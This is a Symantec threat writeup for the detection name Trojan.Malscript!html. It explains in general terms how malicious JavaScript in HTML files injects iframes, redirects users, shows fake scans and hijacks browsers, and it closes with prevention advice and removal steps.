Trojan.Malscript!html

Printer Friendly Page

Discovered: January 15, 2008
Updated: April 23, 2010 8:50:57 AM
Type: Trojan, Virus
Infection Length: Varies
Systems Affected: Linux, Mac, Windows

Trojan.Malscript!html is a detection name used by Symantec to identify HTML files that contain malicious JavaScript.

HTML files may contain malicious content for a number of reasons. The files may have been specially crafted to be intrinsically malicious, or they may be legitimate HTML files that have been infected by threats such as W32.Ramnit or W32.Fujacks.CE . The files may be downloaded on to the computer during Web browsing, by other malware, inside archive files, and through various other methods.

With the Web browser now used for online shopping, banking, social networking, and entertainment, it has become one of the most popular targets for attackers. The attack surface is large, with third-party plugins and extensions that extend browser capabilities also being vulnerable to attack. Browser compromise can therefore be the cause of some of the most significant security breaches and hence can cause a great deal of harm to compromised computers and the victims of the attacks.

Authors of malicious JavaScript may go to lengths to ensure that their code is obfuscated so that its functionality is hidden from casual observers and to complicate the task of analysis. Obfuscation may also be used in an attempt to create code that is able to circumvent security software.

When injected into an HTML file, malicious JavaScript can:

  • Exploit browser and plugin vulnerabilities to run arbitrary code
  • Display fake antivirus scans and other fraudulent information
  • Download JavaScript, HTML, and other files
  • Hijack browsing sessions
  • Redirect users to malicious websites
  • Steal information

If a Symantec antivirus product displays a detection alert for this threat, it means the computer is already protected and the Symantec product will effectively remove this threat from the computer.

Antivirus Protection Dates

  • Initial Rapid Release version January 18, 2008 revision 040
  • Latest Rapid Release version May 14, 2018 revision 016
  • Initial Daily Certified version January 18, 2008 revision 007
  • Latest Daily Certified version May 13, 2018 revision 022
  • Initial Weekly Certified release date January 16, 2008

Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.

Writeup By: Henry Bell

Discovered: January 15, 2008
Updated: April 23, 2010 8:50:57 AM
Type: Trojan, Virus
Infection Length: Varies
Systems Affected: Linux, Mac, Windows

Trojan.Malscript!html is a detection name used by Symantec to identify HTML files that contain malicious JavaScript.


Background information
JavaScript is an interpreted scripting language that runs inside the Web browser. Although the code runs inside a security 'sandbox' that limits its access to the operating system and computer hardware, attackers have found ways in which to leverage the language to perform actions that may result in harm to the compromised computer.

JavaScript provides functions that allow the browser to be manipulated programmatically. The code can manipulate what is displayed by the browser, as well as certain aspects of the way in which Web pages are represented internally and how the user is able to interact with them. JavaScript in addition provides control over certain Web navigation features.

In addition to features of the JavaScript language that can be used for malicious purposes, JavaScript can also be used as a means to exploit browser vulnerabilities as well as vulnerabilities in third-party plugins.


Iframe injection
One of the most common ways in which malicious JavaScript can be injected into an HTML page is through the use of the inline frame feature of HTML. Inline frames are usually referred to using the name of the corresponding HTML keyword, 'iframe'. An iframe may legitimately be used to embed content from one Web page directly into another. For example, this may be done to display real-time content from [REMOTE DOMAIN NAME].com within a page on [HOST DOMAIN NAME].com.

Attackers may insert invisible iframes into HTML files to load remote code, steal information, hijack the browser, and so on. Injected iframes are typically appended to the end of HTML files and may not be noticeable to the casual observer.




Redirects to malicious URLs
Malicious JavaScript may be used to redirect users to malicious URLs that attempt to hoist further malware onto the computer by way of browser or plugin exploits that lead to drive-by downloads. This provides attackers with a channel through which to execute any arbitrary program on users' computers.


Fake security scans
JavaScript can be used to display fake antivirus scans that may appear to be standalone programs. Icons and interface paradigms from the Windows OS are appropriated to make the scan appear to be authentic. Following the fake scan, users are prompted to download a fraudulent program (Trojan.FakeAV ) to 'fix' the non-existent threats.




Browser hijacks
Web browsing sessions may be hijacked by JavaScript that performs operations on browser windows and controls. Window sizes and controls may be altered, or the JavaScript may cause the browser to reload the same page or image multiple times in order to increase hit counts for a particular image, Web page, or advertising campaign. Malicious JavaScript may also be used by attackers to steal information entered into the Web browser; online banking sign-in details and credit card numbers, for example.


Browser exploits

JavaScript may be used to exploit browser vulnerabilities or vulnerabilities in third-party plugins. Modern Web browsers are complex, and by definition are able to download content from remote locations. This means that flaws in Web browsers can be especially damaging, as a user need only be directed to a malicious URL in order for the exploit to function.

Specially crafted exploit code may target flaws in the way a browser handles the JavaScript language itself, which can lead to an attacker running further malicious code on the compromised computer; JavaScript can also be used to deliver the exploit code to another exploitable target, such as a browser plugin or other program.


Obfuscation

Malicious JavaScript is often obfuscated so as to conceal its functionality from casual observers. The obfuscation may take the form of simply re-encoding certain strings to mask URLs, or at the other end of the scale may involve encrypting the code itself so that it is completely unrecognizable.


Are there any tell-tale signs?
The following symptoms may be observed when a Web page that contains malicious JavaScript is opened in the browser:

  • Pop-up windows
  • Empty windows
  • Multiple redirects, possibly to malicious sites
  • Embedded iframes
  • Plugins or other programs starting unexpectedly
  • Other strange or unexpected behavior within the browser

Note: The above behaviors do not necessarily indicate the presence of malicious JavaScript.

Some browsers or browser add-ons can be configured to warn users when certain suspicious JavaScript features are encountered.


What are the risks?
Because of today's reliance on the Web browser, malicious JavaScript can have a significant impact if it is allowed to execute. The most serious harm results when JavaScript is used to exploit a browser vulnerability and then download and execute further malicious executables without the user's knowledge. For this reason, many sophisticated targeted attacks begin with a browser exploit, as it is easy to coerce or persuade users into visiting a malicious URL.


What can I do to minimize the risks?
Users should always ensure that they are running the most up-to-date version of their chosen Web browser and upgrade to the most recently released third-party plugins. Although disabling JavaScript altogether is one way to improve security, its use is required for many Web technologies to function correctly. As such, users are recommended to make use of Web browser features, plugins, or add-ons that can be used to block certain JavaScript features. Users may also consider using tools that block JavaScript from sites not on a whitelist.

Users should always run up-to-date antivirus software with real-time protection such as Norton Antivirus, Norton Internet Security, Norton 360 or Symantec Endpoint Protection .

Recommendations

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.

Writeup By: Henry Bell

Discovered: January 15, 2008
Updated: April 23, 2010 8:50:57 AM
Type: Trojan, Virus
Infection Length: Varies
Systems Affected: Linux, Mac, Windows

You may have arrived at this page either because you have been alerted by your Symantec product about this risk, or you are concerned that your computer has been affected by this risk.

Before proceeding further we recommend that you run a full system scan . If that does not resolve the problem you can try one of the options available below.



FOR NORTON USERS
If you are a Norton product user, we recommend you try the following resources to remove this risk.

Removal Tool


If you have an infected Windows system file, you may need to replace them using from the Windows installation CD .


How to reduce the risk of infection
The following resources provide further information and best practices to help reduce the risk of infection.


FOR BUSINESS USERS
If you are a Symantec business product user, we recommend you try the following resources to remove this risk.

Identifying and submitting suspect files
Submitting suspicious files to Symantec allows us to ensure that our protection capabilities keep up with the ever-changing threat landscape. Submitted files are analyzed by Symantec Security Response and, where necessary, updated definitions are immediately distributed through LiveUpdate™ to all Symantec end points. This ensures that other computers nearby are protected from attack. The following resources may help in identifying suspicious files for submission to Symantec.


Removal Tool

If you have an infected Windows system file, you may need to replace them using from the Windows installation CD .


How to reduce the risk of infection
The following resource provides further information and best practices to help reduce the risk of infection.
Protecting your business network



MANUAL REMOVAL
The following instructions pertain to all current Symantec antivirus products.

1. Performing a full system scan
How to run a full system scan using your Symantec product


2. Restoring settings in the registry
Many risks make modifications to the registry, which could impact the functionality or performance of the compromised computer. While many of these modifications can be restored through various Windows components, it may be necessary to edit the registry. See in the Technical Details of this writeup for information about which registry keys were created or modified. Delete registry subkeys and entries created by the risk and return all modified registry entries to their previous values.

Writeup By: Henry Bell